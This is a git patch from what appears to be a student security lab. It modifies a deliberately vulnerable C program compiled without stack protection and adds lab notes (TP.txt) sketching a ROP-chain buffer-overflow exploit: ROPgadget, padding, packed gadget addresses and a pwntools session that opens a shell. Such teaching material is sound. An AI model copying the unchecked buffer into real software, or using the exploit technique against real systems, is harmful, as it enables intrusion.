From e6cf606ab4d3be75c022345d17ed49e03d2c6707 Mon Sep 17 00:00:00 2001
From: luevard <lucas.evard@etu.uca.fr>
Date: Sat, 7 Oct 2023 14:37:22 +0200
Subject: [PATCH] :sparkles: PRESQUE FINI

---
 Bufferoverflow/main.c | 17 ++++++++---------
 Dockerfile            |  7 ++++---
 TP.txt                | 19 +++++++++++++++++++
 3 files changed, 31 insertions(+), 12 deletions(-)

diff --git a/Bufferoverflow/main.c b/Bufferoverflow/main.c
index ae20590..e12b4c7 100644
--- a/Bufferoverflow/main.c
+++ b/Bufferoverflow/main.c
@@ -1,12 +1,9 @@
 #include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
 
-void secretFunction()
-{
-    printf("Congratulations!\n");
-    printf("You have entered in the secret function!\n");
-}
-
-void echo()
+void check()
 {
     char buffer[20];
     printf("Enter some text:\n");
@@ -16,6 +13,8 @@ void echo()
 
 int main()
 {
-    echo();
+    check();
     return 0;
-}
\ No newline at end of file
+}
+
+//python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
diff --git a/Dockerfile b/Dockerfile
index 078b313..7541021 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,16 +1,17 @@
 FROM ubuntu:latest
 
 RUN apt-get update && \
-    apt install -y python3 gcc musl-dev python3-pip && \
+    apt install -y python3 gcc musl-dev python3-pip gdb nano && \
     python3 -m pip install ROPgadget && \
-    python3 -m pip install capstone
+    python3 -m pip install capstone && \
+    python3 -m pip install pwntools
 
 COPY Bufferoverflow /root/Bufferoverflow
 COPY ROPgadget /root/ROPgadget
 
 WORKDIR /root/Bufferoverflow
 
-RUN gcc main.c -o binaire -fno-stack-protector
+RUN gcc main.c -o binaire -fno-stack-protector -ggdb -Wl,-z,relro,-z,now,-z,noexecstack -static
 
 WORKDIR /root
 
diff --git a/TP.txt b/TP.txt
index d56c722..f0ab785 100644
--- a/TP.txt
+++ b/TP.txt
@@ -1,2 +1,21 @@
 Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?
 
+---
+
+docker build . -t secu
+
+docker run --rm -it secu
+
+---
+
+python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
+
+dans un fichier python : 
+    p = b'A' * 120 => buffer overflow
+    p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul 
+
+    r.process("./binaire") => on execute le binaire
+    r.sendline(p) => on met dans le buffer toutes les adresses et l'attaque Bufferoverflow
+    r.interactive() => on met a disposition le shell interactif sur le terminal
+
+    
\ No newline at end of file